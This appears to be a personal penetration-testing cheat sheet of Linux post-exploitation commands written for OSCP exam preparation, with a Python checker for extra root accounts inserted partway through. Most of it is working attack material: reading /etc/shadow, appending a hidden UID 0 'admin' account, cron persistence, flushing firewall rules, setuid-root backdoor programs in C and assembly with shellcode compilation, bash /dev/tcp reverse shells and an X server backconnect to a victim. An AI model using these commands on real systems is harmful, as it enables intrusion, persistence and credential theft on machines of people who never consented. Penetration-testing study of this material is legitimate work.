|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 07.09.2017

Linux post exploitation


This command list was also part of my notes for the Offensive Security Certified Professional exam. It summarizes some useful methods for gathering information on a Linux host after having gained command execution.

upgrade shell


To upgrade your shell to a fully functional interactive shell, use the following commands:

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
reset

login information


A first step should be to determine which privileges you have and how often other users access the system.

show user privileges

id
whoami

login history

w
who
last
lastlog

system information


distro and kernel info

cat /etc/issue
uname -a

hostname

hostname
hostname -f

running tasks

ps aux
pstree
kill -9 1234
killall ...

installed packages

dpkg -l
yum list installed
pacman -Q

user management


usernames and password hashes

cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > passwd.unshadow
ls -l /home
echo "admin:x:0:0:admin,,,:/root:/bin/bash" >> /etc/passwd
echo "admin:`openssl passwd -6 password`:12345:0:99999:7:::" >> /etc/shadow
echo "admin:`echo password | mkpasswd -m sha-512 -s`:12345:0:99999:7:::" >> /etc/shadow
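The appended "admin" line above leaves a second UID 0 account in /etc/passwd, which is exactly what a defender should look for. The following check is an added example and is not part of the original notes; it parses passwd-format text (a constructed sample is embedded, the file path is an assumption) and reports extra UID 0 or GID 0 accounts, duplicate user names and malformed entries.

```python
import re

# Constructed sample in /etc/passwd format (not taken from a real host).
# The last line mirrors the append shown above and should be flagged.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
admin:x:0:0:admin,,,:/root:/bin/bash
"""

_NUM_RE = re.compile(r"^\d+$")


def audit_passwd(text, allowed_uid0=("root",)):
    """Return a list of (line_no, reason) findings for passwd-format text.

    Flags any UID 0 account not in allowed_uid0 (the classic passwd-append
    backdoor), a GID 0 account that is not allowed either, duplicate user
    names and lines that do not have seven numeric-where-expected fields.
    An empty list means nothing looked wrong.
    """
    findings = []
    seen = set()
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not _NUM_RE.match(f[2]) or not _NUM_RE.match(f[3]):
            findings.append((no, "malformed entry: %r" % line))
            continue
        name, uid, gid = f[0], int(f[2]), int(f[3])
        if name in seen:
            findings.append((no, "duplicate user name %s" % name))
        seen.add(name)
        if uid == 0 and name not in allowed_uid0:
            findings.append((no, "UID 0 account %s is not allowed" % name))
        elif gid == 0 and name not in allowed_uid0:
            findings.append((no, "GID 0 account %s is not allowed" % name))
    return findings


def audit_file(path="/etc/passwd"):
    """Run audit_passwd on a real file (path is an assumption)."""
    with open(path) as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for no, reason in audit_passwd(SAMPLE_PASSWD):
        print("line %d: %s" % (no, reason))
```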

network configuration


network interfaces

ip l
ip a

routes

ip r
ip r l t 0
ip r a 10.1.1.0/24 via 192.168.11.3
netstat -r

dns server

cat /etc/resolv.conf

open ports

netstat -tunap
ss -ltun

firewall rules

iptables -L
iptables -F

enable ssh

/etc/init.d/ssh start
service ssh start
systemctl start ssh

network


network scan

for ip in {1..254}; do arping -w1 -c1 192.168.199.$ip ; done

arp cache

arp -n
ip n

active connections

ss -tun
lsof -nPi

file system


df -h
lsblk -f
mount
mount -o remount,rw,exec /

searching files


grep

grep -rHi "string" /path

find

find /path -type f -exec grep -Hi "string" {} \;
find / -iname "*.bak" -perm -004 -ls 2>/dev/null
find / -type f -amin -60 2>/dev/null
find / -perm /6000 -ls 2>/dev/null

scheduled tasks


list scheduled scripts

ls /etc/cron.*
cat /etc/crontab
crontab -l

add new task

echo "* * * * * root date >> /tmp/log" >> /etc/crontab
crontab -e
crontab -r

network file system


find and mount

nmap -Pn <network> -p 111,2049
showmount -e <target>
mount -t nfs <target>:/folder /mnt/nfs

squashfs


modify squashfs image

unsquashfs image.file
vim squashfs-root/<file_to_change>
mksquashfs squashfs-root/ new_image.file -noappend -always-use-fragments

selfmade backdoors


setuid.c

#include <unistd.h>
#include <stdlib.h>

/* Only useful when installed as a setuid-root binary: setuid(0) then
   succeeds and the spawned shell runs as root. Such files are what the
   find / -perm /6000 search in "searching files" above turns up. */
int main(void)
{
    if (setuid(0) != 0)      /* fails unless the binary is setuid root */
        return 1;
    system("/bin/bash");
    return 0;
}

setuid.asm

BITS 32
global _start
section .text
_start:

; setuid(0): eax = 0x17, ebx = 0, edx = 0 (cdq sign-extends eax into edx)
xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h

; execve("//bin/sh", NULL, NULL): eax = 0x0b, ebx = path built on the stack
xor ecx,ecx
push ecx                ; terminating NUL
push 0x68732f6e         ; "n/sh"
push 0x69622f2f         ; "//bi"
lea eax,[ecx+0bh]
mov ebx,esp
int 80h

compile asm

nasm -f elf setuid.asm
ld -o setuid -melf_i386 setuid.o

compile to shellcode

nasm -f bin setuid.asm -o shellcode
xxd -p shellcode

bash backconnect


Bash offers a pseudo-device (/dev/tcp) for creating network connections. The second command is an alternative that does the same as the first.

/bin/bash -i < /dev/tcp/localhost/8888 1>&0 2>&0
/bin/bash -i &> /dev/tcp/localhost/8888 0>&1

xserver backconnect


To connect graphical applications to your local X server you can use Xnest:

Xnest :1

or configure X11 to allow inbound TCP connections and reboot:

/etc/gdm/custom.conf

[security]
DisallowTCP=false

In both cases you have to disable access control with:

xhost +

On the victim you can then start:

xterm -display <target-ip>:1